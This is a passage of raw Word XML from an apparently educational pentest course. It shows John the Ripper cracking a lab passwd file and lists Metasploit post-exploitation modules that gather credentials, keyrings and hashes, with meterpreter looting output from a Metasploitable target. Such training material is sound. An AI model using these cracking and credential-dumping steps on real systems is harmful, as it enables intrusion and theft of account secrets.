        <w:t>[+] Now load your pistolero with john.txt and shoot! Good luck!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECAE716" w14:textId="75C09114" w:rsidR="00186DA5" w:rsidRDefault="00186DA5" w:rsidP="00186DA5">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5CA71C" w14:textId="502DA858" w:rsidR="00186DA5" w:rsidRPr="00186DA5" w:rsidRDefault="00186DA5" w:rsidP="00186DA5">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00186DA5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ncrack &amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> THC</w:t>
      </w:r>
      <w:r w:rsidRPr="00186DA5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3989F871" w14:textId="5DD4FFD7" w:rsidR="00186DA5" w:rsidRDefault="00E13820" w:rsidP="00186DA5">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Ncrack and THC Hydra are brute force tools to crack remote authentication services. They can perform rapid attacks on the most common protocols such as ftp, http, https and several databases.</w:t>
      </w:r>
      <w:r w:rsidR="009F4D49">
        <w:t xml:space="preserve"> They will not be presented here but it is good to know that they exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5423A35C" w14:textId="77777777" w:rsidR="00186DA5" w:rsidRPr="00186DA5" w:rsidRDefault="00186DA5" w:rsidP="00186DA5">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1074FF0A" w14:textId="08626833" w:rsidR="00B07768" w:rsidRDefault="00B07768" w:rsidP="00B07768">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4244149D" w14:textId="5B66615C" w:rsidR="00B07768" w:rsidRDefault="00C338FB" w:rsidP="00B07768">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Use John to crack gathered hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585FAB0B" w14:textId="142A826F" w:rsidR="00A5222B" w:rsidRPr="00A5222B" w:rsidRDefault="00C338FB" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  ANSWERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEDA3D5" w14:textId="37EE9F3D" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kali:~# john --show passwd.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B3050F" w14:textId="77777777" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sys:batman:3:3:sys:/dev:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D5F2D5" w14:textId="77777777" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>klog:123456789:103:104::/home/klog:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D19BCF" w14:textId="77777777" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>service:service:1002:1002:,,,:/home/service:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41534A83" w14:textId="77777777" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F0603B0" w14:textId="07E2AA83" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>3 password hashes cracked, 4 left</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FA9287" w14:textId="77777777" w:rsidR="00080D1A" w:rsidRDefault="00080D1A" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="738E7932" w14:textId="1C502726" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Where passwd.txt is as follow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C7A8D9" w14:textId="77777777" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kali:~# cat passwd.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A52CD3" w14:textId="77777777" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B589FF" w14:textId="77777777" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>daemon:*:1:1:daemon:/usr/sbin:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197BE956" w14:textId="77777777" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bin:*:2:2:bin:/bin:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B338B9" w14:textId="77777777" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1393D8B1" w14:textId="77777777" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sync:*:4:65534:sync:/bin:/bin/sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA487D7" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRPr="00B616D6" w:rsidRDefault="00B70BCA" w:rsidP="00B70BCA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B616D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[…snip…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF86575" w14:textId="77777777" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>statd:*:114:65534::/var/lib/nfs:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA1556" w14:textId="55ED12BC" w:rsidR="00A5222B" w:rsidRDefault="00A5222B" w:rsidP="00A5222B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>snmp:*:115:65534::/var/lib/snmp:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F4A01A" w14:textId="614DD7B4" w:rsidR="00124E17" w:rsidRPr="00124E17" w:rsidRDefault="00124E17" w:rsidP="00124E17">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~# john –wordlist=/usr/share/wordlists/rockyou.txt passwd.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C917443" w14:textId="77777777" w:rsidR="00080D1A" w:rsidRDefault="00080D1A" w:rsidP="009D32BF">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDF4DE2" w14:textId="7314B5DA" w:rsidR="00401BE1" w:rsidRDefault="00912860" w:rsidP="009D32BF">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>John successfully cracked three hashes</w:t>
      </w:r>
      <w:r w:rsidR="00401BE1">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00681579">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687E6A43" w14:textId="55E11C08" w:rsidR="00401BE1" w:rsidRDefault="00401BE1" w:rsidP="00401BE1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sys:batman</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BF7F5B" w14:textId="3532AE64" w:rsidR="00401BE1" w:rsidRDefault="00401BE1" w:rsidP="00401BE1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>klog:123456789</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5705619D" w14:textId="5C854DA0" w:rsidR="00401BE1" w:rsidRDefault="00401BE1" w:rsidP="00401BE1">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>service:service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EDF6E6" w14:textId="77777777" w:rsidR="00080D1A" w:rsidRDefault="00080D1A" w:rsidP="009D32BF">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F3AAD9" w14:textId="5426DCB5" w:rsidR="00681579" w:rsidRDefault="00681579" w:rsidP="009D32BF">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Executing john without the wordlist give us three other </w:t>
      </w:r>
      <w:r w:rsidR="00225541">
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00C34270">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAB15D5" w14:textId="0417159B" w:rsidR="009D32BF" w:rsidRDefault="00681579" w:rsidP="00681579">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>postgres:postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A47E27" w14:textId="5AACD246" w:rsidR="00681579" w:rsidRDefault="00681579" w:rsidP="00681579">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>user:user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330BB9D9" w14:textId="2DCFB8D2" w:rsidR="00681579" w:rsidRPr="00681579" w:rsidRDefault="00681579" w:rsidP="00681579">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msfadmin:msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D983D6A" w14:textId="42E48217" w:rsidR="009D32BF" w:rsidRDefault="00773017" w:rsidP="009D32BF">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Bonus: execute the creds command. Passwords and hashes are a</w:t>
      </w:r>
      <w:r w:rsidR="0075221A">
        <w:t>utomatically st</w:t>
      </w:r>
      <w:r w:rsidR="00575528">
        <w:t xml:space="preserve">ored in database (if hashes </w:t>
      </w:r>
      <w:r w:rsidR="009A782F">
        <w:t>have been</w:t>
      </w:r>
      <w:r w:rsidR="0075221A">
        <w:t xml:space="preserve"> cracked in Metasploit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535F8A04" w14:textId="5131BDED" w:rsidR="002131E4" w:rsidRDefault="00D42229" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Application passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C501C37" w14:textId="3FDB6FFC" w:rsidR="00D42229" w:rsidRPr="00D42229" w:rsidRDefault="00D42229" w:rsidP="00D42229">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Users</w:t>
      </w:r>
      <w:r w:rsidR="007D10D1">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> passwords </w:t>
      </w:r>
      <w:r w:rsidR="007D10D1">
        <w:t xml:space="preserve">are often stored </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in web browsers or other applications. Tools such as NirSoft Tools (see </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00363125">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.nirsfot.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>) are useful to gather juicy information from a compromised machine.</w:t>
      </w:r>
      <w:r w:rsidR="007D10D1">
        <w:t xml:space="preserve"> From outlook to thunderbird passing through Chrome, Firefox, Nirsoft Password recovery utilities can be a real asset in </w:t>
      </w:r>
      <w:r w:rsidR="002A74E5">
        <w:t xml:space="preserve">pentesters </w:t>
      </w:r>
      <w:r w:rsidR="007D10D1">
        <w:t>toolbox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9A8174" w14:textId="3E75FA09" w:rsidR="00F41E0F" w:rsidRDefault="00F41E0F" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F92DCF9" w14:textId="0064E0DD" w:rsidR="00DF24DC" w:rsidRDefault="00DF24DC" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Once an attacker gained access to a machine and may have escalated privileges, he can enumerate the machine to access even more information about his target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3913410C" w14:textId="747BC7D8" w:rsidR="00DF24DC" w:rsidRDefault="00DF24DC" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Multiple post exploitation script</w:t>
      </w:r>
      <w:r w:rsidR="00080D1A">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are already included in Metasploit and make the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00F762B4">
        <w:t>’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> life easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4C1A0C" w14:textId="7F914F03" w:rsidR="00AE1064" w:rsidRDefault="00230E96" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Here are</w:t>
      </w:r>
      <w:r w:rsidR="00AE1064">
        <w:t xml:space="preserve"> modules that can be used to enumerate a target after gaining an access to it</w:t>
      </w:r>
      <w:r w:rsidR="00A078CF">
        <w:t>. An</w:t>
      </w:r>
      <w:r w:rsidR="00AE1064">
        <w:t xml:space="preserve"> example on metasploitable2 previously exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02798905" w14:textId="77777777" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; run post/linux/gather/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD8B1D7" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">run post/linux/gather/checkcontainer         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21574521" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">run post/linux/gather/enum_system            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8A2676" w14:textId="627E462E" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>run post/linux/gather/mount_cifs_creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F06632" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">run post/linux/gather/checkvm                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E47B42B" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">run post/linux/gather/enum_users_history     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF245B3" w14:textId="61052ACC" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>run post/linux/gather/openvpn_credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB4D39F" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">run post/linux/gather/enum_configs           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D2F29B" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">run post/linux/gather/enum_xchat             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6268C3C6" w14:textId="2016E81A" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>run post/linux/gather/pptpd_chap_secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A3E7B8" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">run post/linux/gather/enum_network           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBC9B61" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">run post/linux/gather/gnome_commander_creds  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B7917" w14:textId="452CA4D7" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>run post/linux/gather/tor_hiddenservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F636DA0" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">run post/linux/gather/enum_protections       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D1525A" w14:textId="7EC2B9EB" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">run post/linux/gather/gnome_keyring_dump     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67261AA0" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">run post/linux/gather/enum_psk               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D55E22" w14:textId="0DD6090E" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="00AE1064">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>run post/linux/gather/hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D516A2C" w14:textId="0665A2B3" w:rsidR="00AE1064" w:rsidRDefault="00AE1064" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="006A8E72" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; run post/linux/gather/checkvm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E755AD" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FCE9268" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Gathering System info ....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D38CD7" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] This appears to be a 'VMware' virtual machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CEE939" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">meterpreter &gt; run post/linux/gather/enum_configs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D616BC" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6432FAC5" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Running module against metasploitable.localdomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CB348E" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FD7EF1" w14:textId="3D137582" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FB9B27" w14:textId="7726F825" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] apache2.conf stored in /root/.msf4/loot/20180704012514_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.conf_894649.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707BD219" w14:textId="0B714B7C" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] ports.conf stored in /root/.msf4/loot/20180704012515_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.conf_823338.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59380C5B" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[-] Failed to open file: /etc/nginx/nginx.conf: core_channel_open: Operation failed: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563EE1E3" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[-] Failed to open file: /etc/snort/snort.conf: core_channel_open: Operation failed: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CB1B5" w14:textId="323B71ED" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] my.cnf stored in /root/.msf4/loot/20180704012515_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.conf_695989.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EA4A56" w14:textId="4AFFB27D" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] ufw.conf stored in /root/.msf4/loot/20180704012516_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.conf_682673.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832C06D" w14:textId="1EBA5654" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] sysctl.conf stored in /root/.msf4/loot/20180704012516_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.conf_698213.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0CE0C1" w14:textId="77777777" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[-] Failed to open file: /etc/security.access.conf: core_channel_open: Operation failed: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1706B6" w14:textId="104BC9B7" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[+] shells stored in /root/.msf4/loot/20180704012516_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.enum.conf_389136.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3AF8F5" w14:textId="7525F169" w:rsidR="00E32046" w:rsidRDefault="00E32046" w:rsidP="00E32046">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> [-] Failed to open file: /etc/opt/lampp/etc/httpd.conf: core_channel_open: Operation failed: 1</w:t>
      </w:r>
    </w:p>
